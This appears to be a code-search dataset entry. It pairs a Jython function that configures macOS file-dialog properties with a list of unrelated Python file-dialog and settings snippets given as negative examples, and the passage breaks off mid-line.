def setFileDialogParameters(lReportOnly=False, lDefaults=False, lSelectDirectories=None, lPackagesT=None): myPrint("D", "In ", inspect.currentframe().f_code.co_name, "()") if not Platform.isOSX(): return _TRUE = "true" _FALSE = "false" _DIRS_FD = "apple.awt.fileDialogForDirectories" # When True you can select a Folder (rather than a file) _PKGS_FD = "apple.awt.use-file-dialog-packages" # When True allows you to select a 'bundle' as a file; False means navigate inside the bundle # "com.apple.macos.use-file-dialog-packages" # DEPRECATED since Monterrey - discovered this about MD2022.5(4090) - refer: java.desktop/sun/lwawt/macosx/CFileDialog.java # FileDialog defaults # "apple.awt.fileDialogForDirectories" default "false" >> set "true" to allow Directories to be selected # "apple.awt.use-file-dialog-packages" default "true" >> set "false" to allow access to Mac 'packages' if debug or lReportOnly: myPrint("B", "Parameters set: ReportOnly: %s, Defaults:%s, SelectDirectories:%s, PackagesT:%s" % (lReportOnly, lDefaults, lSelectDirectories, lPackagesT)) txt = ("Before setting" if not lReportOnly else "Reporting only") for setting in [_DIRS_FD, _PKGS_FD]: myPrint("DB", "%s: '%s': '%s'" %(pad(txt,14), pad(setting,50), System.getProperty(setting))) if lReportOnly: return if lDefaults: System.setProperty(_DIRS_FD,_FALSE) System.setProperty(_PKGS_FD,_TRUE) else: if lSelectDirectories is not None: System.setProperty(_DIRS_FD, (_TRUE if lSelectDirectories else _FALSE)) if lPackagesT is not None: System.setProperty(_PKGS_FD, (_TRUE if lPackagesT else _FALSE)) for setting in [_DIRS_FD, _PKGS_FD]: myPrint("DB", "After setting: '%s': '%s'" %(pad(setting,50), System.getProperty(setting))) return
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _startup_system(self):\n\n self._config_path.set(filedialog.asksaveasfilename())\n self._system = System(self._config_path.get())\n\n self._start_frame.pack_forget()\n self._main_frame.pack()", "def pkg_app_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._pkg_app_path_var.set(filename)", "def persist_macos(self) -> None:", "def user_safety_config():\n\n\tprint_section_header(\"USER SAFETY\", Fore.BLUE)\n\n\tif prompt_yes_no(top_line=\"-> Lock Mac as soon as screen saver starts?\",\n\t bottom_line=\"If your screen is black or on screensaver mode, you'll be prompted for a password to login every time.\"):\n\t\tprint_confirmation(\"Configuring account lock on screensaver...\")\n\t\tsp.run(['defaults', 'write', 'com.apple.screensaver', 'askForPassword', '-int', '1'], stdout=sp.PIPE)\n\t\tsp.run(['defaults', 'write', 'com.apple.screensaver', 'askForPasswordDelay', '-int', '0'], stdout=sp.PIPE)\n\n\tif prompt_yes_no(top_line=\"-> Display all file extensions?\",\n\t bottom_line=\"This prevents malware from disguising itself as another file type.\"):\n\t\tprint_confirmation(\"Configuring display of all file extensions...\")\n\t\tsp.run(['defaults', 'write', 'NSGlobalDomain', 'AppleShowAllExtensions', '-bool', 'true'], stdout=sp.PIPE)\n\n\tif prompt_yes_no(top_line=\"-> Disable saving to the cloud by default?\",\n\t bottom_line=\"This prevents sensitive documents from being unintentionally stored on the cloud.\"):\n\t\tprint_confirmation(\"Disabling cloud saving by default...\")\n\t\tsp.run(['defaults', 'write', 'NSGlobalDomain', 'NSDocumentSaveNewDocumentsToCloud', '-bool', 'false'], stdout=sp.PIPE)\n\n\tif prompt_yes_no(top_line=\"-> Show hidden files in Finder?\",\n\t bottom_line=\"This lets you see all files on the system without having to use the terminal.\"):\n\t\tprint_confirmation(\"Displaying hidden files in Finder...\")\n\t\tsp.run(['defaults', 'write', 'com.apple.finder', 'AppleShowAllFiles', '-boolean', 'true'], shell=True, stdout=sp.PIPE)\n\n\t# Reset finder after messing with it.\n\tprint_confirmation(\"Resetting Finder to finalize changes...\")\n\tsp.run(['killAll', 'Finder'], stdout=sp.PIPE)", "def fileDialog(*args, application: bool=True, defaultFileName: AnyStr=\"\", directoryMask:\n AnyStr=\"\", mode: int=0, title: AnyStr=\"\", **kwargs)->AnyStr:\n pass", "def set_spec_file(self):\n self.specfile = select_file(os.getcwd())\n if self.specfile is not None:\n self.spec_file_button.setStyleSheet(\"Text-align:left\")\n self.spec_file_button.setText(self.specfile)\n else:\n self.specfile = None\n self.spec_file_button.setText('')\n if self.is_exp_exists() or self.is_exp_set():\n self.set_experiment()", "def input_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._input_path_var.set(filename)", "def __init__(\n self,\n title:str=\"Universal File Dialog\",\n icon:str=\"\",\n show_hidden:bool=False,\n include_files:bool=True,\n multiselect:bool=True,\n select_dirs:bool=True,\n select_files:bool=True,\n unix_delimiter:bool=True,\n stdout:bool=False\n ):\n\n if not isinstance(title, str):\n raise TypeError(\"Argument title must be type string.\")\n\n self.title = title\n\n if icon:\n if not isinstance(icon, str):\n raise TypeError(\"Argument icon must be type string.\")\n\n if not isfile(icon):\n raise FileNotFoundError(f\"File not found: {icon}\")\n\n self.icon = icon\n\n else: \n self.icon = \"\"\n\n if show_hidden:\n self.show_hidden = True\n else:\n self.show_hidden = False\n\n if include_files:\n self.include_files = True\n else:\n 
self.include_files = False\n\n if multiselect:\n self.multiselect = True\n else:\n self.multiselect = False\n\n if select_dirs:\n self.select_dirs = True\n else:\n self.select_dirs = False\n\n if select_files:\n self.select_files = True\n else:\n self.select_files = False\n\n if unix_delimiter:\n self.unix_delimiter = True\n else:\n self.unix_delimiter = False\n\n if stdout:\n self.stdout = True\n else:\n self.stdout = False\n\n # Tkinter:\n self.dialog = Tk()\n self.dialog.withdraw()\n self.dialog.title(self.title)\n self.dialog.minsize(width=300, height=200)\n self.dialog.geometry(\"500x300\")\n self.dialog.update_idletasks()\n\n self.file_icon=PhotoImage(\n file=f\"{dirname(__file__)}/file.gif\",\n master=self.dialog\n ).subsample(50)\n\n self.folder_icon=PhotoImage(\n file=f\"{dirname(__file__)}/folder.gif\",\n master=self.dialog\n ).subsample(15)\n \n self.disk_icon=PhotoImage(\n file=f\"{dirname(__file__)}/disk.gif\",\n master=self.dialog\n ).subsample(15)\n\n if self.icon:\n self.dialog.iconbitmap(self.icon)\n else:\n self.dialog.iconbitmap(f\"{dirname(__file__)}/icon.ico\")\n \n # Widgets:\n self.paneview = PanedWindow(\n self.dialog,\n sashwidth=7,\n bg=\"#cccccc\",\n bd=0,\n )\n\n self.left_pane = PanedWindow(self.paneview)\n self.right_pane = PanedWindow(self.paneview)\n self.paneview.add(self.left_pane)\n self.paneview.add(self.right_pane)\n\n self.treeview_x_scrollbar=Scrollbar(self.left_pane, orient=\"horizontal\")\n self.treeview_y_scrollbar=Scrollbar(self.left_pane, orient=\"vertical\")\n self.list_box_x_scrollbar=Scrollbar(self.right_pane, orient=\"horizontal\")\n self.list_box_y_scrollbar=Scrollbar(self.right_pane, orient=\"vertical\")\n \n # tstyle = Style().configure(\".\", )\n\n self.treeview=Treeview(\n self.left_pane,\n xscrollcommand=self.treeview_x_scrollbar.set,\n yscrollcommand=self.treeview_y_scrollbar.set,\n show=\"tree\",\n selectmode=\"browse\",\n # style=tstyle\n )\n\n\n self.list_box=Listbox(\n self.right_pane,\n xscrollcommand=self.list_box_x_scrollbar.set,\n yscrollcommand=self.list_box_y_scrollbar.set,\n width=34,\n highlightthickness=0,\n bd=2,\n relief=\"ridge\"\n )\n\n if self.multiselect:\n self.list_box.config(selectmode=\"extended\")\n else:\n self.list_box.config(selectmode=\"browse\")\n\n self.cancel_button = Button(\n self.left_pane,\n text=\"Cancel\",\n command=self.cancel\n )\n\n self.submit_button = Button(\n self.right_pane,\n text=\"Submit\",\n command=self.submit\n )\n\n self.treeview_x_scrollbar.config(command=self.treeview.xview)\n self.treeview_y_scrollbar.config(command=self.treeview.yview)\n self.list_box_x_scrollbar.config(command=self.list_box.xview)\n self.list_box_y_scrollbar.config(command=self.list_box.yview)\n \n #Layout:\n self.dialog.rowconfigure(0, weight=1)\n self.dialog.columnconfigure(0, weight=1)\n\n self.left_pane.grid_rowconfigure(0, weight=1)\n self.left_pane.grid_columnconfigure(0, weight=1)\n self.right_pane.grid_rowconfigure(0, weight=1)\n self.right_pane.grid_columnconfigure(0, weight=1)\n\n self.paneview.paneconfigure(\n self.left_pane,\n minsize=100,\n #Start off w/ the sash centered in the GUI:\n width=(self.dialog.winfo_width() / 2) - \n ceil((self.paneview.cget(\"sashwidth\") * 1.5)),\n )\n self.paneview.paneconfigure(self.right_pane, minsize=100)\n\n self.paneview.grid(\n row=0,\n column=0,\n sticky=\"nsew\"\n )\n\n self.treeview.grid(\n row=0,\n column=0,\n sticky=\"nsew\"\n )\n self.treeview_y_scrollbar.grid(\n row=0,\n column=1,\n sticky=\"ns\"\n )\n self.treeview_x_scrollbar.grid(\n row=1,\n column=0,\n 
columnspan=2,\n sticky=\"ew\"\n )\n\n self.list_box.grid(\n row=0,\n column=0,\n sticky=\"nsew\"\n )\n self.list_box_y_scrollbar.grid(\n row=0,\n column=1,\n sticky=\"ns\"\n )\n self.list_box_x_scrollbar.grid(\n row=1,\n column=0,\n columnspan=2,\n sticky=\"ew\"\n )\n\n self.cancel_button.grid(\n row=2,\n column=0,\n sticky=\"w\",\n padx=10, \n pady=10\n )\n self.submit_button.grid(\n row=2,\n column=0,\n columnspan=2,\n sticky=\"e\",\n padx=10,\n pady=10\n )\n \n #Bindings, Protocols, & Misc:\n self.dialog.bind(\"<Control-w>\", self.cancel)\n self.treeview.bind(\"<<TreeviewSelect>>\", self.treeview_select)\n self.treeview.bind(\"<Double-Button-1>\", self.dialog_populate)\n self.treeview.bind(\"<Return>\", self.dialog_populate)\n self.treeview.bind(\"<Right>\", self.dialog_populate)\n self.list_box.bind(\"<<ListboxSelect>>\", self.list_box_select)\n self.list_box.bind(\"<Return>\", self.submit)\n self.dialog.protocol(\"WM_DELETE_WINDOW\", self.cancel)\n\n self.dialog_selection = deque()\n self.selection_paths = deque()\n\n for disk in self.get_disks():\n self.treeview.insert(\n \"\",\n index=\"end\",\n text=disk,\n image=self.disk_icon,\n )\n\n self.dialog.focus()", "def system_properties(self):\r\n return dict(self._get_system_properties(self.java))", "def readInConfigFileDlg( self ):\n pass", "def saveInConfigFileDlg( self ):\n pass", "def init_conf_windows(settings={}):\n if os.name == 'nt':\n original_settings = conf.settings\n conf.settings = conf.Config(conf.FIXED_SETTINGS, conf.ADJUSTABLE_SETTINGS)\n conf.settings.installation_id = conf.settings.get_installation_id()\n conf.settings.update(settings)", "def onLoad (self):\n #productive #onButton\n profprint()\n self.fileDialog = qt.QFileDialog(self.parent)\n self.fileDialog.setDirectory(slicer.modules.needlefinder.path.replace(\"NeedleFinder.py\",\"Config\"))\n self.fileDialog.options = self.fileDialog.DontUseNativeDialog\n self.fileDialog.acceptMode = self.fileDialog.AcceptOpen\n self.fileDialog.defaultSuffix = \"cfg\"\n self.fileDialog.setNameFilter(\"Configuration File (*.cfg)\")\n self.fileDialog.connect(\"fileSelected(QString)\", self.onLoadFileSelected)\n self.fileDialog.show()", "def checkOS():\n\tglobal fileSeperator\n\tif sys.platform=='win32':\n\t\tprint \"System identified as Windows.\"\n\t\tfileSeperator = \"\\\\\"\n\telse:\n\t\tprint \"System identified as MacOSX.\"\n\t\tfileSeperator = \"/\"", "def onLoad (self):\r\n # productive #onButton\r\n profprint()\r\n self.dirDialog = qt.QFileDialog(self.parent)\r\n self.dirDialog.setDirectory(slicer.modules.needlefinder.path.replace(\"NeedleFinder.py\", \"Config\"))\r\n self.dirDialog.options = self.dirDialog.DontUseNativeDialog\r\n self.dirDialog.acceptMode = self.dirDialog.AcceptOpen\r\n self.dirDialog.defaultSuffix = \"cfg\"\r\n self.dirDialog.setNameFilter(\"Configuration File (*.cfg)\")\r\n self.dirDialog.connect(\"fileSelected(QString)\", self.onLoadFileSelected)\r\n self.dirDialog.show()", "def select_app():\n panel = Cocoa.NSOpenPanel.openPanel()\n panel.setCanChooseFiles_(True)\n panel.setCanChooseDirectories_(True)\n panel.setResolvesAliases_(True)\n\n if(panel.runModal() == Cocoa.NSOKButton):\n pathArray = panel.filenames()\n path = pathlib.Path(pathArray[0])\n\n plistPath = path /'Contents'/'Info.plist'\n infoFile = plistPath\n\n try:\n appSize = subprocess.check_output(['du', '-shg', str(path)]).split()[0].decode('utf-8')\n n.views['appSize'].setStringValue_(str(appSize))\n except Exception as err:\n print(err)\n\n 
n.views['appLocation'].setStringValue_(str(path))\n\n try:\n plist = str(infoFile)\n with open(plist, 'rb') as f:\n info = plistlib.load(f)\n\n if 'CFBundleName' in info:\n global collectedName\n collectedName = info['CFBundleName']\n n.views['appName'].setStringValue_(collectedName)\n else:\n n.views['appName'].setStringValue_('')\n\n if 'CFBundleShortVersionString' in info:\n global collectedVersion\n collectedVersion= info['CFBundleShortVersionString']\n n.views['appVersion'].setStringValue_(collectedVersion)\n else:\n n.views['appVersion'].setStringValue_('')\n\n if 'CFBundleIconFile' in info:\n global collectedIcon\n collectedIcon = pathlib.Path(plist).parent / 'Resources' / info['CFBundleIconFile']\n n.views['appIcon'].setStringValue_(str(collectedIcon))\n else:\n n.views['appIcon'].setStringValue_('')\n\n if 'CFBundleIdentifier' in info:\n global collectedIdentifier\n collectedIdentifier = info['CFBundleIdentifier']\n n.views['appIdentifier'].setStringValue_(collectedIdentifier)\n else:\n n.views['appIdentifier'].setStringValue_('')\n\n except Exception as err:\n print('An Error Occured: {0}'.format(err))", "def askopenfilename(self, *args, **kw):\n\n self.tk.tk_setPalette('#888888')\n save_update_step = self.update_step\n self.update_step = 0\n\n filename = tkinter.filedialog.askopenfilename(parent=self.tk)\n if filename:\n self.readwtf(filename)\n self.redraw_letters()\n self.update_step = save_update_step\n self.tk.tk_setPalette('#000000')", "def configure(prompt_list):\n darwin_vers = int(os.uname()[2].split('.')[0])\n edited_prefs = {}\n for (key, prompt) in prompt_list:\n newvalue = get_input_with_default('%15s: ' % prompt, pref(key))\n if darwin_vers == 10:\n # old behavior in SL: hitting return gives you an empty string,\n # and means accept the default value.\n edited_prefs[key] = newvalue or pref(key) or ''\n else:\n # just use the edited value as-is\n edited_prefs[key] = newvalue\n\n if FOUNDATION_SUPPORT:\n for key, value in edited_prefs.items():\n try:\n CFPreferencesSetAppValue(key, value, BUNDLE_ID)\n except BaseException:\n print('Could not save configuration!', file=sys.stderr)\n raise ConfigurationSaveError\n # remove repo_path if it exists since we don't use that\n # any longer (except for backwards compatibility) and we don't\n # want it getting out of sync with the repo_url\n CFPreferencesSetAppValue('repo_path', None, BUNDLE_ID)\n CFPreferencesAppSynchronize(BUNDLE_ID)\n\n else:\n try:\n existing_prefs = readPlist(PREFSPATH)\n existing_prefs.update(edited_prefs)\n # remove repo_path if it exists since we don't use that\n # any longer (except for backwards compatibility) and we don't\n # want it getting out of sync with the repo_url\n if 'repo_path' in existing_prefs:\n del existing_prefs['repo_path']\n writePlist(existing_prefs, PREFSPATH)\n except (IOError, OSError, ExpatError):\n print('Could not save configuration to %s' % PREFSPATH,\n file=sys.stderr)\n raise ConfigurationSaveError", "def __call__(self):\n\n (width_offset, height_offset)=self.get_offset(self.dialog)\n self.dialog.geometry(f\"+{width_offset}+{height_offset}\")\n self.dialog.update_idletasks()\n self.dialog.deiconify()\n\n self.dialog.wait_window()\n\n for i, path in enumerate(self.dialog_selection):\n if self.unix_delimiter:\n self.dialog_selection[i] = sub(\"\\\\\\\\\", \"/\", path)\n else:\n self.dialog_selection[i] = sub(\"/\", \"\\\\\\\\\", path)\n\n\n if self.stdout:\n [print(item) for item in self.dialog_selection]\n\n return list(self.dialog_selection)", "def action(self):\n 
self.filename = self.ui_SelectedName.text()\n if self.filename == \"\" or self.filename is None:\n return\n\n dirname = fs.path.forcedir(\".\")\n if self.wparm is not None:\n dirname = self.selected_dir\n if dirname.startswith(self.active_url):\n filename = \"{}{}\".format(fs.path.forcedir(self.active_url), self.filename)\n else:\n # We can't use fs.path.join and also not fs.path.abspath because of protocol url\n filename = \"{}{}{}\".format(\n fs.path.forcedir(self.active_url),\n fs.path.forcedir(dirname),\n self.filename,\n )\n filename = filename.replace(fs.path.forcedir(\".\"), \"\")\n if self.show_save_action and not self.show_dirs_only:\n self.save_settings()\n self.filename = self.ui_SelectedName.text()\n if self.filename == \"\":\n return\n info = self.get_info(fs.path.split(filename)[1], namespaces=None)\n if info is not None and info.is_dir:\n sel = QtWidgets.QMessageBox.warning(\n self,\n \"Warning\",\n \"You can't create a file with this name: {0}\".format(self.filename),\n QtWidgets.QMessageBox.No,\n )\n elif info is not None and info.is_file:\n sel = QtWidgets.QMessageBox.question(\n self,\n \"Replace Filename\",\n \"This will replace the filename: {0}. Continue?\".format(\n self.filename\n ),\n QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No,\n )\n if sel == QtWidgets.QMessageBox.Yes:\n self.filename = filename\n self.close()\n else:\n pass\n else:\n self.filename = filename\n self.close()\n else:\n self.filename = filename\n self.close()", "def on_open_file(self):\n return tkFileDialog.askopenfilename(\n filetypes=[('default', '*.txt'), ('All files', '*.*')])", "def askOpen(parent,title='',defaultDir='',defaultFile='',wildcard='',style=wx.OPEN):\r\n defaultDir,defaultFile = [GPath(x).s for x in (defaultDir,defaultFile)]\r\n dialog = wx.FileDialog(parent,title,defaultDir,defaultFile,wildcard, style )\r\n if dialog.ShowModal() != wx.ID_OK: \r\n result = False\r\n elif style & wx.MULTIPLE:\r\n result = map(GPath,dialog.GetPaths())\r\n else:\r\n result = GPath(dialog.GetPath())\r\n dialog.Destroy()\r\n return result", "def showpreferencefiles():\n process = subprocess.check_output(['ls', os.path.dirname(os.path.abspath(__file__))+'/Preferences'])\n print()\n for eachFile in process.decode('utf-8').split('\\n'):\n if '__' not in eachFile and '~' not in eachFile:\n print(' {}'.format(eachFile))", "def mv_properties(self):\n f = '/coretemp/coretemp.properties'\n b = os.getcwd()\n shutil.copy2(b+f, '/etc/')", "def browse(self):\n\n self.filepath.set(fd.askopenfilename(initialdir=self._initaldir,\n filetypes=self._filetypes))", "def set(self):\n \n ffmpeg_installed = misc.askquestion(DialogTitle='FFMPEG Check',\n Question='Is FFMPEG installed?')\n \n if ffmpeg_installed:\n ffmpeg_dir = misc.get_dir(DialogTitle='Please select the directory where FFMPEG (binary) is installed:')\n \n if sys.platform=='win32':\n self.ffmpeg = os.path.join(ffmpeg_dir, 'ffmpeg.exe')\n self.ffplay = os.path.join(ffmpeg_dir, 'ffplay.exe')\n else:\n self.ffmpeg = os.path.join(ffmpeg_dir, 'ffmpeg')\n self.ffplay = os.path.join(ffmpeg_dir, 'ffplay')\n \n if not os.path.exists(self.ffmpeg):\n print('Sorry, {0} does not exist!'.format(self.ffmpeg))\n return\n \n if not os.path.exists(self.ffplay):\n print('Sorry, {0} does not exist!'.format(self.ffplay))\n return\n \n else:\n self.ffmpeg = None\n self.ffplay = None\n \n # Save them to the default config file\n info = {'ffmpeg':self.ffmpeg, 'ffplay': self.ffplay}\n try:\n with open(self.config_file, 'w') as outFile:\n json.dump(info, outFile)\n print('Config 
information written to {0}'.format(os.path.abspath(self.config_file)))\n except PermissionError as e:\n curDir = os.path.abspath(os.curdir)\n print('Current directory: {0}'.format(curDir))\n print('Error: {0}'.format(e))\n \n return", "def on_coding_standard_file_browse(self, *args):\n file = GPS.MDI.file_selector()\n if file.path != \"\":\n self.fileEntry.set_text(file.path)", "def on_coding_standard_file_browse(self, *args):\n file = GPS.MDI.file_selector()\n if file.path != \"\":\n self.fileEntry.set_text(file.path)", "def readConfigFileDlg( self ):\n fileName = QtGui.QFileDialog.getOpenFileName( self, \"Read application config file\", self.rsrc.lastFolder, \"Config files (*.cfg)\" )\n if ( fileName ):\n self.readConfigFile( fileName )\n path, fName = os.path.split( str( fileName ) )\n self.rsrc.lastFolder = path", "def preferences(self):\n from dialogs import preferencesDialog\n prefs=preferencesDialog.Create(self,-1,'')\n prefs.ShowModal()", "def alter_subprocess_kwargs_by_platform(**kwargs):\n kwargs.setdefault('close_fds', os.name == 'posix')\n if os.name == 'nt':\n CONSOLE_CREATION_FLAGS = 0 # Default value\n # See: https://msdn.microsoft.com/en-us/library/windows/desktop/ms684863%28v=vs.85%29.aspx\n CREATE_NO_WINDOW = 0x08000000\n # We \"or\" them together\n CONSOLE_CREATION_FLAGS |= CREATE_NO_WINDOW\n kwargs.setdefault('creationflags', CONSOLE_CREATION_FLAGS)\n return kwargs", "def askopenfilename():\n\n file_opt = options = {}\n options['defaultextension'] = '.*'\n options['initialdir'] = 'User\\\\'\n options['initialfile'] = ''\n options['parent'] = root\n options['title'] = 'choose file'\n options['multiple'] = 1\n\n # get filename\n filename = tk.filedialog.askopenfilename(**file_opt)\n\n if filename:\n self.sourcefile = filename\n if len(filename) is 1:\n file_path_var.set(filename)\n else:\n file_path_var.set(\n \"Multiple files, including {}\".format(filename[0]))", "def __showPathPickerDialog(self):\n if self.__mode == E5PathPickerModes.NoMode:\n return\n \n if self.__mode == E5PathPickerModes.CustomMode:\n self.pickerButtonClicked.emit()\n return\n \n self.aboutToShowPathPickerDialog.emit()\n \n windowTitle = self.__windowTitle\n if not windowTitle:\n if self.__mode == E5PathPickerModes.OpenFileMode:\n windowTitle = self.tr(\"Choose a file to open\")\n elif self.__mode == E5PathPickerModes.OpenFilesMode:\n windowTitle = self.tr(\"Choose files to open\")\n elif self.__mode in [\n E5PathPickerModes.SaveFileMode,\n E5PathPickerModes.SaveFileEnsureExtensionMode,\n E5PathPickerModes.SaveFileOverwriteMode]:\n windowTitle = self.tr(\"Choose a file to save\")\n elif self.__mode == E5PathPickerModes.DirectoryMode:\n windowTitle = self.tr(\"Choose a directory\")\n \n directory = self._editorText()\n if not directory and self.__defaultDirectory:\n directory = self.__defaultDirectory\n if self.__mode == E5PathPickerModes.OpenFilesMode:\n directory = os.path.expanduser(directory.split(\";\")[0])\n else:\n directory = os.path.expanduser(directory)\n if not os.path.isabs(directory) and self.__defaultDirectory:\n directory = os.path.join(self.__defaultDirectory, directory)\n directory = Utilities.fromNativeSeparators(directory)\n \n if self.__mode == E5PathPickerModes.OpenFileMode:\n path = E5FileDialog.getOpenFileName(\n self,\n windowTitle,\n directory,\n self.__filters)\n path = Utilities.toNativeSeparators(path)\n elif self.__mode == E5PathPickerModes.OpenFilesMode:\n paths = E5FileDialog.getOpenFileNames(\n self,\n windowTitle,\n directory,\n self.__filters)\n path = 
\";\".join([Utilities.toNativeSeparators(path)\n for path in paths])\n elif self.__mode == E5PathPickerModes.SaveFileMode:\n path = E5FileDialog.getSaveFileName(\n self,\n windowTitle,\n directory,\n self.__filters,\n E5FileDialog.Options(E5FileDialog.DontConfirmOverwrite))\n path = Utilities.toNativeSeparators(path)\n elif self.__mode == E5PathPickerModes.SaveFileEnsureExtensionMode:\n path, selectedFilter = E5FileDialog.getSaveFileNameAndFilter(\n self,\n windowTitle,\n directory,\n self.__filters,\n None,\n E5FileDialog.Options(E5FileDialog.DontConfirmOverwrite))\n path = Utilities.toNativeSeparators(path)\n if path:\n ext = QFileInfo(path).suffix()\n if not ext:\n ex = selectedFilter.split(\"(*\")[1].split(\")\")[0]\n if ex:\n path += ex\n elif self.__mode == E5PathPickerModes.SaveFileOverwriteMode:\n path = E5FileDialog.getSaveFileName(\n self,\n windowTitle,\n directory,\n self.__filters)\n path = Utilities.toNativeSeparators(path)\n elif self.__mode == E5PathPickerModes.DirectoryMode:\n path = E5FileDialog.getExistingDirectory(\n self,\n windowTitle,\n directory,\n E5FileDialog.Options(E5FileDialog.ShowDirsOnly))\n path = Utilities.toNativeSeparators(path)\n while path.endswith(os.sep):\n path = path[:-1]\n elif self.__mode == E5PathPickerModes.DirectoryShowFilesMode:\n path = E5FileDialog.getExistingDirectory(\n self,\n windowTitle,\n directory,\n E5FileDialog.Options(E5FileDialog.DontUseNativeDialog))\n path = Utilities.toNativeSeparators(path)\n while path.endswith(os.sep):\n path = path[:-1]\n \n if path:\n self._setEditorText(path)\n self.pathSelected.emit(path)", "def FileDialog( message, wildcard, style, defaultDir=os.getcwd(), defaultFile='' ):\n dlg = wx.FileDialog( wx.GetApp().GetTopWindow(), message, defaultDir, defaultFile, wildcard, style )\n if dlg.ShowModal() == wx.ID_OK:\n if style & wx.MULTIPLE:\n result = dlg.GetPaths()\n else:\n result = dlg.GetPath()\n else:\n result = False\n dlg.Destroy()\n \n return result", "def set_working_dir(self):\n self.working_dir = select_dir(os.getcwd())\n if self.working_dir is not None:\n self.set_work_dir_button.setStyleSheet(\"Text-align:left\")\n self.set_work_dir_button.setText(self.working_dir)\n else:\n self.set_work_dir_button.setText('')\n msg_window('please select valid working directory')\n return", "def init_settings(self):\n if not os.path.exists(self.settingsFilePath):\n settings_dir = os.getenv(\"APPDATA\") + \"\\\\\" + qApp.applicationName()\n if not os.path.exists(settings_dir):\n os.makedirs(settings_dir)\n setting_path = \"\"\n if getattr(sys, 'frozen', False):\n setting_path = os.path.dirname(sys.executable)\n elif __file__:\n setting_path = os.path.dirname(__file__)\n shutil.copyfile(os.path.join(setting_path, \"resources\\eksettings.ini\"), self.settingsFilePath)\n return", "def menu_Open():\n asdf = tkFileDialog.askopenfilename()\n print(asdf)", "def setup():\n setFormat()\n setFilename()\n setScreenMode()", "def files_manage(self):\n sender = self.sender()\n\n if sender == self.mapsDirectoryButton:\n path_to_map, _ = QFileDialog.getOpenFileName(self,\n caption=\"Открыть\",\n directory=\"/\",\n filter=\"Image files (*.jpg *.JPG *.png *.jpeg *.bmp\")\n\n if path_to_map:\n self.mapsDirectoryLine.setText(path_to_map)\n\n elif sender == self.troopsDirectoryButton:\n directory = QFileDialog.getExistingDirectory(self,\n caption=\"Открыть\",\n directory=\"/\")\n\n if directory:\n self.troopsDirectoryLine.setText(directory)", "def test_os_system(self):\n self.assertEqual(self.settings.OS_SYSTEM, platform.system())", 
"def init_filemenu(self):\n self.menubar[\"filemenu\"] = Menu(self.menubar[\"menubar\"], tearoff=0)\n self.menubar[\"filemenu\"].add_command(label=\"New\", command=todo)\n self.menubar[\"filemenu\"].add_command(label=\"Open\", command=todo)\n self.menubar[\"filemenu\"].add_command(label=\"Save\", command=todo)\n self.menubar[\"filemenu\"].add_command(label=\"Save as...\", command=todo)\n self.menubar[\"filemenu\"].add_command(label=\"Close\", command=todo)\n self.menubar[\"filemenu\"].add_separator()\n self.menubar[\"menubar\"].add_cascade(\n label=\"File\", menu=self.menubar[\"filemenu\"])", "def configure_custom_terminal(new_path):\n lnp.userconfig['terminal'] = new_path\n lnp.userconfig.save_data()", "def change_exteditor(self):\r\n path, valid = QInputDialog.getText(self, self.tr('External editor'),\r\n self.tr('External editor executable path:'),\r\n QLineEdit.Normal,\r\n CONF.get(self.ID, 'external_editor/path'))\r\n if valid:\r\n CONF.set(self.ID, 'external_editor/path', unicode(path))", "def _restore_options(self):\r\n fn = self._opt_file_name()\r\n if os.path.exists(fn):\r\n try:\r\n opt = pickle.load(open(fn, \"r\"))\r\n self.tb_pragma.SetValue(opt[\"topic\"])\r\n self.tb_package.SetValue(opt[\"package\"])\r\n self.tb_file_header.SetValue(opt[\"header\"])\r\n self.tb_target_folder.SetValue(opt[\"target_folder\"])\r\n self.tb_encoding.SetValue(opt[\"encoding\"])\r\n except Exception as ex:\r\n print(\"Error durring restore default options\")\r\n print(ex)", "def __init__(self):\r\n\r\n super().__init__() # Loading the Tk window instance\r\n\r\n self.title(\"Song Storage\") # Naming the root window\r\n self.resizable(False, False) # Disabling resizing of the root window\r\n self.iconphoto(True, PhotoImage(file=\"Resources/Icons/AppIcon.png\")) # Loading the icon of the application\r\n\r\n global config_var # Using the global variable that reads and modifies the configuration file\r\n\r\n # Application's GUI was invoked from a CLI instance; updating the configuration file variable\r\n if config_var['RUN-MODE']['run_mode'] == \"1\":\r\n config_var.set('RUN-MODE', 'run_mode', \"0\")\r\n\r\n try:\r\n with open('config.ini', 'w') as configfile_gui:\r\n config_var.write(configfile_gui) # Writing the changes to the configuration file\r\n configfile_gui.close()\r\n\r\n except IOError:\r\n messagebox.showerror(\"Writing to file failed\", \"Failed to write new value to the configuration file.\"\r\n \" Please make sure no other applications are interacting with the configuration \"\r\n \"file and that \\\"config.ini\\\" is located in the folder of the application.\")\r\n\r\n # Application is running in debugging mode\r\n if config_var['RUN-MODE']['run_mode'] == \"2\":\r\n print(\"\\nError: Failed to write new value to the configuration file. 
Please make sure no other \"\r\n \"applications are interacting with the configuration file and that \\\"config.ini\\\" is located \"\r\n \"in the folder of the application.\")\r\n\r\n # The variable that shows the current run-mode of the application\r\n # It is used by the radiobuttons in the filemenu\r\n self.gui_menu_var = StringVar(self, config_var['RUN-MODE']['run_mode'])\r\n \r\n \"\"\"Declaring the variables the GUI will use\"\"\"\r\n self.menubar = Menu() # The file menu where the user can specify global settings for the application\r\n self.filemenu = Menu(self.menubar, tearoff=0) # Submenu for the file menu\r\n self.runmode_menu = Menu(self.filemenu, tearoff=0) # Submenu showing the current run-mode of the application\r\n \r\n self.folder_frame = Frame() # The frame that will display the current media folder\r\n\r\n # The value that stores the current media folder's path as a string\r\n self.var = StringVar(self, \"Please choose the folder where you'd like to store your media:\")\r\n\r\n # The label that will display the current media folder\r\n self.media_folder_label = Label(self.folder_frame, textvariable=self.var)\r\n\r\n # This button will prompt the user to select a media folder\r\n self.folder_button = Button(self.folder_frame, text=\"Browse...\",\r\n command=lambda: folder_selector(None, self))\r\n\r\n # The button that allows the user to change the currently selected media folder\r\n self.change_folder_button = ttk.Button(self.folder_frame, text=\"Change...\",\r\n command=lambda: folder_selector(None, self))\r\n\r\n # The frame that will display all the media content available inside the media folder\r\n self.media_frame = Frame()\r\n self.canvas = Canvas()\r\n\r\n self.path_frame_parent = Frame(self.media_frame, relief=GROOVE, width=500, height=100, bd=1)\r\n\r\n # Variables related to the search frame of the application\r\n self.search_frame = Frame()\r\n\r\n self.back_image = 